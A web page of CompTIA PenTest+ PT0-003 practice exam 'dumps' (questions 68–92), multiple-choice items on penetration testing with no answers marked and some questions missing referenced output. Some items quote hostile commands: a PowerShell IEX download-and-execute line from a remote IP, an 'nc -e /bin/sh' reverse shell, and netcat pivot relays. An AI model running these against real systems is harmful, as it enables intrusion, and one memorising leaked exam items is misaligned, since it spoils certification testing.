[Mar 07, 2025] Ultimate PT0-003 Guide to Prepare Free Latest CompTIA Practice Tests Dumps [Q68-Q92]

NO.68 A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:
bash
for var in -MISSING TEXT-
do
ping -c 1 192.168.10.$var
done
Which of the following pieces of code should the penetration tester use in place of the -MISSING TEXT- placeholder?

crunch 1 254 loop

seq 1 254

echo 1-254

{1.-254}

NO.69 A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

Create a one-shot system service to establish a reverse shell.

Obtain /etc/shadow and brute force the root password.

Run the nc -e /bin/sh <…> command.

Move laterally to create a user account on LDAP

NO.70 Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split(“”)[1] If ($1 -eq “administrator”) { echo IEX(New-Object Net.WebClient).Downloadstring(‘http://10.10.11.12:8080/ul/windows.ps1’) | powershell -noprofile -} Which of the following is the penetration tester most likely trying to do?

Change the system’s wallpaper based on the current user’s preferences.

Capture the administrator’s password and transmit it to a remote server.

Conditionally stage and execute a remote script.

Log the internet browsing history for a systems administrator.

NO.71 Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

An unknown-environment assessment

A known-environment assessment

A red-team assessment

A compliance-based assessment

NO.72 Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Latches

Pins

Shackle

Plug

NO.73 Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

Risk analysis

Peer review

Root cause analysis

Client acceptance

NO.74 A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

Exploiting a configuration weakness in the SQL database

Intercepting outbound TLS traffic

Gaining access to hosts by injecting malware into the enterprise-wide update server

Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

Establishing and maintaining persistence on the domain controller

NO.75 A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?

Close the reverse shell the tester is using.

Note this finding for inclusion in the final report.

Investigate the high numbered port connections.

Contact the client immediately.

NO.76 A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

Send an SMS with a spoofed service number including a link to download a malicious application.

Exploit a vulnerability in the MDM and create a new account and device profile.

Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.

Infest a website that is often used by employees with malware targeted toward x86 architectures.

NO.77 A penetration tester needs to confirm the version number of a client’s web application server.
Which of the following techniques should the penetration tester use?

SSL certificate inspection

URL spidering

Banner grabbing

Directory brute forcing

NO.78 A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = ‘123’ hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt,
10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?

Changing passwords that were created before this code update

Keeping hashes created by both methods for compatibility

Rehashing all old passwords with the new code

Replacing the SHA-256 algorithm to something more secure

NO.79 A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

Aircrack-ng

Wireshark

Wifite

Kismet

NO.80 A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester’s machine. Which of the following commands should the tester use to do this task from the tester’s host?

attacker_host$ nmap -sT <target_cidr> | nc -n <compromised_host> 22

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0<backpipe | nc <target_cidr> 80 | tee backpipe

attacker_host$ nc -nlp 8000 | nc -n <target_cidr> attacker_host$ nmap -sT 127.0.0.1 8000

attacker_host$ proxychains nmap -sT <target_cidr>

NO.81 Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

Whether the cloud service provider allows the penetration tester to test the environment

Whether the specific cloud services are being used by the application

The geographical location where the cloud services are running

Whether the country where the cloud service is based has any impeding laws

NO.82 During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

Nikto

Burp Suite

smbclient

theHarvester

NO.83 During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

SOW.

SLA.

ROE.

NDA

NO.84 Which of the following components should a penetration tester include in an assessment report?

User activities

Customer remediation plan

Key management

Attack narrative

NO.85 You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

NO.86 A penetration tester obtains password dumps associated with the target and identifies strict lockout policies.
The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

Credential stuffing

MFA fatigue

Dictionary attack

Brute-force attack

NO.87 A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

Halt the penetration test.

Contact law enforcement.

Deconflict with the penetration tester.

Assume the alert is from the penetration test.

NO.88 A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

Enforce enhanced password complexity requirements.

Disable or upgrade SSH daemon.

Disable HTTP/301 redirect configuration.

Create an out-of-band network for management.

Implement a better method for authentication.

Eliminate network management and control interfaces.

NO.89 During the reconnaissance phase, a penetration tester obtains the following output:
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
Which of the following operating systems is MOST likely installed on the host?

Linux

NetBSD

Windows

macOS

NO.90 A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

Increase password complexity.

Implement system hardening.

Restrict simultaneous user log-ins.

Require local network access.

NO.91 Hotspot Question
Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

NO.92 A penetration tester wrote the following script on a compromised system:
#!/bin/bash
network=’10.100.100′
ports=’22 23 80 443′
for x in {1 .. 254};
do (nc -zv $network.$x $ports );
done
Which of the following would explain using this script instead of another tool?

The typical tools could not be used against Windows systems.

The configuration required the penetration tester to not utilize additional files.

The Bash script will provide more thorough output.

The penetration tester wanted to persist this script to run on reboot.

Leave a Reply Cancel reply